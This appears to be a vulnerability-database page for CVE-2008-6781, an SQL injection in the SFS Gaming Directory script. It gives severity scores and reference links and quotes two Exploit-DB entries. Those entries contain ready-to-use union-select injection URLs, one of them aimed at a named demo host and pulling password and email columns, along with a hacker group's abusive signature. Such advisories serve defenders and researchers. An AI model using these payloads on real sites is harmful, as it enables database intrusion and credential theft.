CVE-2008-6781
published 2009-05-01CVE-2008-6781: SQL injection vulnerability in directory.php in Sites for Scripts (SFS) Gaming Directory allows remote attackers to execute arbitrary SQL commands via the…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.22%
65.0th percentile
SQL injection vulnerability in directory.php in Sites for Scripts (SFS) Gaming Directory allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a list action.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SFS EZ Gaming Directory - 'cat_id' SQL Injection
exploitdb·2008-10-31
CVE-2008-6781 SFS EZ Gaming Directory - 'cat_id' SQL Injection
SFS EZ Gaming Directory - 'cat_id' SQL Injection
---
#######################################################
# Author : BeyazKurt
# Contact : [email protected]
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
#
# Script : SFS Gaming Directory
# Price: $ 24.95
# Script Site: http://scripts-for-sites.com/item.php?item=112
#
# D0rk : "sie go. amk iÅŸinizmi yok xD"
#
# SQL Injection Vuln. :
#
# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# Example: http://game.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# -------------------------------
# Ya RAMADHAN
# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
# pigs for dedication : WE Are
Exploit-DB
SFS EZ Gaming Directory - 'directory.php' SQL Injection
exploitdb·2008-10-31
CVE-2008-6781 SFS EZ Gaming Directory - 'directory.php' SQL Injection
SFS EZ Gaming Directory - 'directory.php' SQL Injection
---
SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability
__ __ __
/ / / /_ _______/ /__ __ __
/ /_/ / / / / ___/ / _ \/ / / /
/ __ / /_/ / / / / __/ /_/ /
/_/ /_/\__,_/_/ /_/\___/\__, /
/____/
Website script: http://www.scripts-for-sites.info/index.php
Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
LiveDemo:
http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
Special Thx : Darckc0de
# milw0rm.com [2008-10-31]
No writeups or analysis indexed.
http://osvdb.org/49553http://secunia.com/advisories/32558http://www.securityfocus.com/bid/32021https://exchange.xforce.ibmcloud.com/vulnerabilities/46250https://exchange.xforce.ibmcloud.com/vulnerabilities/46251https://www.exploit-db.com/exploits/6894https://www.exploit-db.com/exploits/6906http://osvdb.org/49553http://secunia.com/advisories/32558http://www.securityfocus.com/bid/32021https://exchange.xforce.ibmcloud.com/vulnerabilities/46250https://exchange.xforce.ibmcloud.com/vulnerabilities/46251https://www.exploit-db.com/exploits/6894https://www.exploit-db.com/exploits/6906
2009-05-01
Published